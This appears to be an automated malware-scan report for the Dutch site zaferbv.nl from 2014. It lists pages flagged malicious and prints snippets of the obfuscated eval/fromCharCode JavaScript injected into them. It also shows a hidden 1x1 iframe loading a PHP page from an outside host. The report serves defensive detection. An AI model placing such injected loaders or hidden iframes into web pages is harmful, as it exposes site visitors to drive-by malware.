Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zaferbv.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zaferbv.nl/ | 200 OK Content-Length: 10202 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aa=([].slice+'vr3').substr(1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ww=window;ss=new String();s=String;12-function(){e=ww.eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24 Antivirus reports:
| ||
http://zaferbv.nl/autopoetsbedrijf/ | 200 OK Content-Length: 6911 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aa=([].slice+'vr3').substr(1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ww=window;ss=new String();s=String;12-function(){e=ww.eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24 Antivirus reports:
| ||
http://zaferbv.nl/test404page.js | 404 Not Found Content-Length: 1073 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://patikekmanimi.com/img/aoyvdvanencwergrkz.php <iframe src="http://patikekmanimi.com/img/aoyvdvanencwergrkz.php" width="1" height="1" frameborder="0"> | ||
http://zaferbv.nl/schoonmaakbedrijf/ | 200 OK Content-Length: 6811 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aa=([].slice+'vr3').substr(1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ww=window;ss=new String();s=String;12-function(){e=ww.eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zaferbv.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 16:17:25 GMT
Accept-Ranges: bytes
ETag: "2e909f2-27da-5042798a8fac0"
Server: Apache/2.2.26 (Unix)
Content-Length: 10202
Content-Type: text/html
Last-Modified: Sun, 28 Sep 2014 22:23:15 GMT
X-Pad: avoid browser bug
...10202 bytes of data.
GET / HTTP/1.1
Host: zaferbv.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 16:17:25 GMT
Accept-Ranges: bytes
ETag: "2e909f2-27da-5042798a8fac0"
Server: Apache/2.2.26 (Unix)
Content-Length: 10202
Content-Type: text/html
Last-Modified: Sun, 28 Sep 2014 22:23:15 GMT
X-Pad: avoid browser bug
...10202 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zaferbv.nl
Referer: http://www.google.com/search?q=zaferbv.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zaferbv.nl
Referer: http://www.google.com/search?q=zaferbv.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.